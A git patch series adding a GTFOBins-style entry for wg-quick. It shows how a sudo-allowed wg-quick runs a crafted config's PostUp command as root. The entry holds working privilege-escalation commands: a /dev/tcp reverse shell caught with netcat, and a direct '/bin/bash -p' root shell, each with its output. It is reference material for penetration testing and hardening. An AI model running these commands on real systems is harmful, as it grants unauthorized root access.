From fba8b35229caef441da838b7dd92846e181114d6 Mon Sep 17 00:00:00 2001
From: virgula <angelo.rosa@protonmail.com>
Date: Wed, 3 Dec 2025 15:29:05 +0100
Subject: [PATCH 1/4] Add wg-quick sudo priv escalation

---
 _gtfobins/wg-quick.md | 42 ++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 42 insertions(+)
 create mode 100644 _gtfobins/wg-quick.md

diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md
new file mode 100644
index 0000000..fc83566
--- /dev/null
+++ b/_gtfobins/wg-quick.md
@@ -0,0 +1,42 @@
+---
+description: If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.
+
+This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same.
+
+functions:
+  sudo:
+    - description:
+        If the `sudo -l` shows such a binary in the output
+
+        ```
+        (ALL) PASSWD: /usr/bin/wg-quick,
+        ```
+
+        This feature can be abused.
+
+      code:
+        Exploit,
+
+        ```
+        cat << EOF > ./wg1.conf
+        [Interface]
+        ListenPort = 51821
+        PrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g=
+
+        PostUp = sh -i >& /dev/tcp/127.0.0.1/1234 0>&1
+
+        EOF
+        ```
+
+        `sudo wg-quick up ./wg1.conf`
+
+        Will send a reverse shell on `127.0.0.1:1234` with root privileges
+
+        ```
+        nc -lvnp 1234
+        listening on [any] 1234 ...
+        connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 55456
+        # whoami
+        root
+        ```
+---
\ No newline at end of file

From ddd3520b01175a67398e061fc4bed39ab07c54ae Mon Sep 17 00:00:00 2001
From: virgula <angelo.rosa@protonmail.com>
Date: Wed, 3 Dec 2025 15:42:05 +0100
Subject: [PATCH 2/4] Update exploit with direct /bin/bash drop

---
 _gtfobins/wg-quick.md | 22 ++++++++++++++++++++++
 1 file changed, 22 insertions(+)

diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md
index fc83566..eec8b5e 100644
--- a/_gtfobins/wg-quick.md
+++ b/_gtfobins/wg-quick.md
@@ -39,4 +39,26 @@ functions:
         # whoami
         root
         ```
+
+        Another more direct way to obain a shell is to avoid the usage of netcat at all
+
+        ```
+        cat << EOF > ./wg1.conf
+        [Interface]
+        ListenPort = 51821
+        PrivateKey = yNwWXHO7oIDQo/b5eS5R0xdVidxm50AwuQoIKTOGy1g=
+
+        PostUp = /bin/bash -p
+
+        EOF
+        ```
+
+        `sudo wg-quick up ./wg1.conf`
+
+        This will directly drop to a `root` shell.
+
+        ```
+        #whoami
+        root
+        ``
 ---
\ No newline at end of file

From a5af2bdd4749f56d45e324c014918e0ad7704512 Mon Sep 17 00:00:00 2001
From: virgula <angelo.rosa@protonmail.com>
Date: Wed, 3 Dec 2025 15:44:06 +0100
Subject: [PATCH 3/4] Update typo

---
 _gtfobins/wg-quick.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md
index eec8b5e..68ff49b 100644
--- a/_gtfobins/wg-quick.md
+++ b/_gtfobins/wg-quick.md
@@ -60,5 +60,5 @@ functions:
         ```
         #whoami
         root
-        ``
+        ```
 ---
\ No newline at end of file

From 0377b620ee42b645b2aba477d2a5945c105f1987 Mon Sep 17 00:00:00 2001
From: virgula <angelo.rosa@protonmail.com>
Date: Fri, 5 Dec 2025 10:55:59 +0100
Subject: [PATCH 4/4] Fix yaml lint

---
 _gtfobins/wg-quick.md | 11 ++++++-----
 1 file changed, 6 insertions(+), 5 deletions(-)

diff --git a/_gtfobins/wg-quick.md b/_gtfobins/wg-quick.md
index 68ff49b..3a7c07e 100644
--- a/_gtfobins/wg-quick.md
+++ b/_gtfobins/wg-quick.md
@@ -1,11 +1,12 @@
 ---
-description: If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.
+description: |
+  If the `wg-quick` binary is allowed via `sudo`, it can be abused to create a fake configuration which allows executing commands with root privileges.
 
-This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same.
+  This example creates a fake config parsed and loaded by `wg-quick`, allowing for obtaining a full reserve shell with root privileges. Note that here, `netcat` will be used, but of course, there are plenty of payloads you can replace to obtain the same.
 
 functions:
   sudo:
-    - description:
+    - description: |
         If the `sudo -l` shows such a binary in the output
 
         ```
@@ -14,7 +15,7 @@ functions:
 
         This feature can be abused.
 
-      code:
+      code: |
         Exploit,
 
         ```
@@ -61,4 +62,4 @@ functions:
         #whoami
         root
         ```
----
\ No newline at end of file
+---